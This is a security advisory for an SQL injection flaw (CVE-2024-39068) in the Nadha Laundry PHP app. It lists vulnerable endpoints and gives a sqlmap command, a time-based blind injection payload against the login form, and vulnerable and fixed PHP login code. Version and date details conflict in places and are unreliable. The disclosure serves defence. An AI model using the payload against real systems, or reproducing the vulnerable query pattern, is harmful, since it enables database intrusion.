SQL Injection at Nadha Laundry v3.2.1
Summary
During my vulnerability research on an open-source project, I discovered SQL Injection vulnerabilities at several endpoints in Nadha Laundry, a laundry management application built with PHP and MySQL and developed by NadhaMedia.
Software Details
Details about POS Nadha Resto.

| Parameter | Value |
|---|---|
| Software | Nadha Laundry |
| Description | Laundry Management App based on Uinsu Web Framework |
| Developer | Aditia Darma Nasution, Hasnah Nur Ardita |
| Vendor URL | https://github.com/haxorsprogramming |
| Software URL | https://github.com/haxorsprogramming/Nadha-Laundry |
SQL Injection at Several Endpoints
Vulnerability Summary:

| Parameter | Value |
|---|---|
| CVE-ID | CVE-2024-39068 |
| Classification | SQL Injection |
| Description | SQL Injection vulnerabilities have been discovered in multiple parameters of Nadha Laundry, both in authenticated and unauthenticated states. |
| Required privilege | Low, Unauth |
| Affected Version | 3.2.0 (#0~612c17a) |
| Publicly disclosed | 13.06.2024 |
We have discovered SQL Injection vulnerabilities in every endpoint that interacts with the database. The following are examples of such endpoints:
- POST /Nadha-Laundry/login/prosesLogin
- POST /Nadha-Laundry/utility/getInfoPelanggan
- etc.
Note: All parameters on the affected endpoints are vulnerable to SQL Injection.
This is an example PoC of how SQL Injection on the login page can be confirmed with sqlmap.
sqlmap:

```
sqlmap -u http://localhost/Nadha-Laundry/login/prosesLogin --data="username=a&password=x" -p username --flush-session --batch --dbms=mysql
```

Response:

```
sqlmap identified the following injection point(s) with a total of 65 HTTP(s) requests:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=a' AND (SELECT 6511 FROM (SELECT(SLEEP(5)))OmZe) AND 'VqXT'='VqXT&password=x
```
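As an added illustration (not code from the Nadha Laundry project or the Uinsu framework, whose database API is not used here), the PHP/MySQL pattern that produces this class of bug in a login handler, beside the prepared-statement form that removes it. The `prosesLogin` function names, the `users` table with `username` and `password_hash` columns, and the `nadha_laundry` database name are assumptions.

```php
<?php
// Hypothetical login handler, not Nadha Laundry's code. Table, column and
// database names are assumed for illustration.

// VULNERABLE: the username is concatenated into the SQL text. The advisory's
// payload (a' AND (SELECT ... SLEEP(5) ...) AND 'VqXT'='VqXT) closes the quoted
// literal, so MySQL parses and executes the injected expression. The ~5 second
// delay sqlmap observed is what marks the parameter as time-based blind.
function prosesLoginVulnerable(PDO $db, string $username, string $password): ?array
{
    $sql = "SELECT id, username, password_hash FROM users "
         . "WHERE username = '" . $username . "'";
    $user = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    if ($user === false || !password_verify($password, $user['password_hash'])) {
        return null;
    }
    return $user;
}

// FIXED: a parameterised query. The SQL text reaches MySQL without the user's
// value in it; the value is bound separately and compared purely as data, so a
// quote or SLEEP() in $username can never change the statement's structure.
function prosesLogin(PDO $db, string $username, string $password): ?array
{
    $stmt = $db->prepare(
        'SELECT id, username, password_hash FROM users WHERE username = :username'
    );
    $stmt->execute([':username' => $username]);
    $user = $stmt->fetch(PDO::FETCH_ASSOC);
    // One response for unknown user and wrong password avoids username enumeration.
    if ($user === false || !password_verify($password, $user['password_hash'])) {
        return null;
    }
    unset($user['password_hash']);
    return $user;
}

// Emulated prepares are disabled so the MySQL server itself performs the
// binding; exceptions mean a failed query cannot silently return nothing.
$db = new PDO(
    'mysql:host=localhost;dbname=nadha_laundry;charset=utf8mb4',
    'app_user',            // placeholder credentials
    'CHANGE_ME',
    [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_EMULATE_PREPARES => false]
);
$user = prosesLogin($db, $_POST['username'] ?? '', $_POST['password'] ?? '');
```

Every other endpoint named in the advisory (for example `utility/getInfoPelanggan`) needs the same treatment: every value that originates from the request is bound as a parameter, never interpolated into the query string.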
Timeline
- 10 June 2024 - Found the vulnerability
- 10 June 2024 - Contacted the developer
- 14 June 2024 - Article published